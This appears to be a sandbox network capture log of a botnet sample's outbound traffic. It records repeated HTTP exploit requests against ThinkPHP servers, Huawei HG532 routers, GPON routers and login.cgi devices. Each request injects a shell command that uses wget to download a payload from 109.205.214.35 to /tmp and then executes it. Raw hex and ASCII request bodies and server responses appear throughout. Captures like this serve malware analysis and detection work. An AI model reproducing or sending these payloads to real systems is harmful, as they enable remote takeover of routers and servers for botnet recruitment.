74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2258192.168.2.135343495.139.70.580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.817991018 CET313OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:51.981389046 CET313OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2259192.168.2.1339150156.77.130.18837215
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.878977060 CET826OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 3b 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 109.205.214.35 -l /tmp/.matrix -r /mips; /bin/busybox chmod 777 * /tmp/.matrix; /tmp/.matrix)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:48.525388002 CET826OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 3b 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 109.205.214.35 -l /tmp/.matrix -r /mips; /bin/busybox chmod 777 * /tmp/.matrix; /tmp/.matrix)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2260192.168.2.1340798109.94.232.38443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.924509048 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2261192.168.2.13479365.248.24.17443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.924510956 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2262192.168.2.13550165.75.91.132443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.924539089 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2263192.168.2.1338176212.31.96.20443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.924544096 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2264192.168.2.135111442.249.172.235443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.924576044 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2265192.168.2.13400305.199.85.11443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.924604893 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2266192.168.2.135364642.221.21.166443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.924618959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2267192.168.2.1347130212.85.105.6780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:47.941812038 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.131295919 CET285INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 128
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Oops! 400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2268192.168.2.1350290212.162.152.24280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:48.073848963 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.238872051 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2269192.168.2.133773288.99.216.11280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:48.114460945 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.669445038 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.844770908 CET1198INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:48 GMT
                                                        Server: Apache
                                                        Vary: accept-language,accept-charset,Accept-Encoding
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Language: en
                                                        Expires: Thu, 21 Mar 2024 04:23:48 GMT
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 42 61 64 20 72 65 71 75 65 73 74 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 73 75 70 70 6f 72 74 40 76 69 63 69 62 6f 78 2e 6c 6f 63 61 6c 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 72 65 71 75 65 73 74 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 28 6f 72 20 70 72 6f 78 79 29 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 0a 20 20 20 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 0a 0a 3c 2f 70 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 73 75 70 70 6f 72 74 40 76 69 63 69 62 6f 78 2e 6c 6f 63 61 6c 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 34 30 30 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 76 69 63 69 62 6f 78 2e 6c 6f 63 61 6c 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 3c 73 70 61 6e 3e 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a
                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Bad request!</title><link rev="made" href="mailto:support@vicibox.local" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Bad request!</h1><p> Your browser (or proxy) sent a request that this server could not understand.</p><p>If you think this is a server error, please contactthe <a href="mailto:support@vicibox.local">webmaster</a>.</p><h2>Error 400</h2><address> <a href="/">vicibox.local</a><br /> <span>Apache</span></address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2270192.168.2.1343026212.248.68.1180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:48.126892090 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:48.340783119 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:48 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2271192.168.2.13455285.209.150.9552869
